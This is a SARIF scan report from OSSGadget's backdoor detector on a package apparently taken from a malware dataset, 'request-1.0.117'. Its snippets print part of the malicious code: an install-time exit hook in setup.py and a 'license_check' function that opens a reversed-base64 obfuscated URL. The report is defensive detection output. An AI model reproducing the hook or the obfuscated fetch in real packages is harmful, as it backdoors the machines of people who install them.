{
  "$schema": "https://schemastore.azurewebsites.net/schemas/json/sarif-2.1.0-rtm.6.json",
  "version": "2.1.0",
  "runs": [
    {
      "tool": {
        "driver": {
          "name": "oss-detect-backdoor",
          "organization": "Microsoft Corporation",
          "product": "OSSGadget (https://github.com/Microsoft/OSSGadget)",
          "version": "0.1.428+ed0e2cfe6a"
        }
      },
      "results": [
        {
          "rule": {
            "id": "BD000700"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration",
            "id": "BD000700"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/request-1.0.117.tar.gz/request-1.0.117.tar/request-1.0.117/setup.py"
                },
                "region": {
                  "startLine": 14,
                  "startColumn": 175,
                  "endLine": 14,
                  "endColumn": 180,
                  "snippet": {
                    "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                    "rendered": {
                      "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                      "markdown": "`def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000700"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration",
            "id": "BD000700"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/request-1.0.117.tar.gz/request-1.0.117.tar/request-1.0.117/setup.py"
                },
                "region": {
                  "startLine": 14,
                  "startColumn": 108,
                  "endLine": 14,
                  "endColumn": 113,
                  "snippet": {
                    "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                    "rendered": {
                      "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                      "markdown": "`def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000700"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration",
            "id": "BD000700"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/request-1.0.117.tar.gz/request-1.0.117.tar/request-1.0.117/setup.py"
                },
                "region": {
                  "startLine": 14,
                  "startColumn": 82,
                  "endLine": 14,
                  "endColumn": 87,
                  "snippet": {
                    "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                    "rendered": {
                      "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                      "markdown": "`def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000700"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration",
            "id": "BD000700"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/request-1.0.117.tar.gz/request-1.0.117.tar/request-1.0.117/setup.py"
                },
                "region": {
                  "startLine": 14,
                  "startColumn": 51,
                  "endLine": 14,
                  "endColumn": 56,
                  "snippet": {
                    "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                    "rendered": {
                      "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                      "markdown": "`def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000700"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration",
            "id": "BD000700"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/request-1.0.117.tar.gz/request-1.0.117.tar/request-1.0.117/setup.py"
                },
                "region": {
                  "startLine": 14,
                  "startColumn": 23,
                  "endLine": 14,
                  "endColumn": 28,
                  "snippet": {
                    "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                    "rendered": {
                      "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                      "markdown": "`def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000702"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration (Environment)",
            "id": "BD000702"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/request-1.0.117.tar.gz/request-1.0.117.tar/request-1.0.117/setup.py"
                },
                "region": {
                  "startLine": 14,
                  "startColumn": 168,
                  "endLine": 14,
                  "endColumn": 179,
                  "snippet": {
                    "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                    "rendered": {
                      "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                      "markdown": "`def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000702"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration (Environment)",
            "id": "BD000702"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/request-1.0.117.tar.gz/request-1.0.117.tar/request-1.0.117/setup.py"
                },
                "region": {
                  "startLine": 14,
                  "startColumn": 75,
                  "endLine": 14,
                  "endColumn": 112,
                  "snippet": {
                    "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                    "rendered": {
                      "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                      "markdown": "`def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000702"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration (Environment)",
            "id": "BD000702"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/request-1.0.117.tar.gz/request-1.0.117.tar/request-1.0.117/setup.py"
                },
                "region": {
                  "startLine": 14,
                  "startColumn": 16,
                  "endLine": 14,
                  "endColumn": 55,
                  "snippet": {
                    "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                    "rendered": {
                      "text": "def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n",
                      "markdown": "`def _post_on_exit():\r\n\t\ttry:\r\n\t\t\timport os\r\n\t\t\ttmp_dir = os.environ.get('TMPDIR') if os.environ.get('TMPDIR') else (os.environ.get('TEMP') if os.environ.get('TEMP') else ('/tmp' if os.path.exists('/tmp') else os.environ.get('HOME')))\r\n\t\t\tos.chdir(tmp_dir)\r\n\t\t\tfrom hmatch import license_check\r\n\t\t\tlicense_check()\r\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000800"
          },
          "message": {
            "text": "Backdoor: Obfuscation",
            "id": "BD000800"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/request-1.0.117.tar.gz/request-1.0.117.tar/request-1.0.117/hmatch.py"
                },
                "region": {
                  "startLine": 57,
                  "startColumn": 15,
                  "endLine": 57,
                  "endColumn": 21,
                  "snippet": {
                    "text": "def license_check():\r\n\tgg = \"\"\r\n\ttry:\r\n\t\tgg = urlopen(base64.b64decode(\"=82cus2Ylh2YvQ3clVXclJ3Lw9GdukHelR2LvoDc0RHa\"[::-1]).decode('utf-8')).read().decode('utf-8')\r\n\texcept Exception as e:\r\n\t\tpass\r\n\tif \"license\" in gg:\r\n",
                    "rendered": {
                      "text": "def license_check():\r\n\tgg = \"\"\r\n\ttry:\r\n\t\tgg = urlopen(base64.b64decode(\"=82cus2Ylh2YvQ3clVXclJ3Lw9GdukHelR2LvoDc0RHa\"[::-1]).decode('utf-8')).read().decode('utf-8')\r\n\texcept Exception as e:\r\n\t\tpass\r\n\tif \"license\" in gg:\r\n",
                      "markdown": "`def license_check():\r\n\tgg = \"\"\r\n\ttry:\r\n\t\tgg = urlopen(base64.b64decode(\"=82cus2Ylh2YvQ3clVXclJ3Lw9GdukHelR2LvoDc0RHa\"[::-1]).decode('utf-8')).read().decode('utf-8')\r\n\texcept Exception as e:\r\n\t\tpass\r\n\tif \"license\" in gg:\r\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000800"
          },
          "message": {
            "text": "Backdoor: Obfuscation",
            "id": "BD000800"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/request-1.0.117.tar.gz/request-1.0.117.tar/request-1.0.117/hmatch.py"
                },
                "region": {
                  "startLine": 2,
                  "startColumn": 84,
                  "endLine": 2,
                  "endColumn": 90,
                  "snippet": {
                    "text": "from __future__ import print_function\r\nimport sys, multiprocessing, warnings, ssl, re, argparse, time, datetime, functools,base64\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ntry:\r\n",
                    "rendered": {
                      "text": "from __future__ import print_function\r\nimport sys, multiprocessing, warnings, ssl, re, argparse, time, datetime, functools,base64\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ntry:\r\n",
                      "markdown": "`from __future__ import print_function\r\nimport sys, multiprocessing, warnings, ssl, re, argparse, time, datetime, functools,base64\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ntry:\r\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000700"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration",
            "id": "BD000700"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/request-1.0.117.tar.gz/request-1.0.117.tar/request-1.0.117/hmatch.py"
                },
                "region": {
                  "startLine": 100,
                  "startColumn": 7,
                  "endLine": 100,
                  "endColumn": 12,
                  "snippet": {
                    "text": "\tprint(\"[*] Scanning started. (\" + str(len(hosts)) + \" targets loaded)\")\r\n\tp = multiprocessing.Pool(threads)\r\n\tresult = p.map_async(scan,[(host,q,match,outfile) for host in hosts])\r\n\tresult.get()\r\n\tprint(\"[*] Finished.\")\r\n\r\n\r\n",
                    "rendered": {
                      "text": "\tprint(\"[*] Scanning started. (\" + str(len(hosts)) + \" targets loaded)\")\r\n\tp = multiprocessing.Pool(threads)\r\n\tresult = p.map_async(scan,[(host,q,match,outfile) for host in hosts])\r\n\tresult.get()\r\n\tprint(\"[*] Finished.\")\r\n\r\n\r\n",
                      "markdown": "`\tprint(\"[*] Scanning started. (\" + str(len(hosts)) + \" targets loaded)\")\r\n\tp = multiprocessing.Pool(threads)\r\n\tresult = p.map_async(scan,[(host,q,match,outfile) for host in hosts])\r\n\tresult.get()\r\n\tprint(\"[*] Finished.\")\r\n\r\n\r\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000600"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Windows Indicator",
            "id": "BD000600"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/request-1.0.117.tar.gz/request-1.0.117.tar/request-1.0.117/hmatch.py"
                },
                "region": {
                  "startLine": 90,
                  "startColumn": 55,
                  "endLine": 90,
                  "endColumn": 59,
                  "snippet": {
                    "text": "\thosts = []\r\n\ttry:\r\n\t\twith open(file,\"r\") as f:\r\n\t\t\thosts = [ re.sub(r'^https?\\:\\/\\/','',hh.strip()) for hh in f.read().splitlines()]\r\n\t\tif len(hosts) == 0:\r\n\t\t\traise Exception(\"Error\")\r\n\texcept:\r\n",
                    "rendered": {
                      "text": "\thosts = []\r\n\ttry:\r\n\t\twith open(file,\"r\") as f:\r\n\t\t\thosts = [ re.sub(r'^https?\\:\\/\\/','',hh.strip()) for hh in f.read().splitlines()]\r\n\t\tif len(hosts) == 0:\r\n\t\t\traise Exception(\"Error\")\r\n\texcept:\r\n",
                      "markdown": "`\thosts = []\r\n\ttry:\r\n\t\twith open(file,\"r\") as f:\r\n\t\t\thosts = [ re.sub(r'^https?\\:\\/\\/','',hh.strip()) for hh in f.read().splitlines()]\r\n\t\tif len(hosts) == 0:\r\n\t\t\traise Exception(\"Error\")\r\n\texcept:\r\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        }
      ],
      "columnKind": "utf16CodeUnits"
    }
  ]
}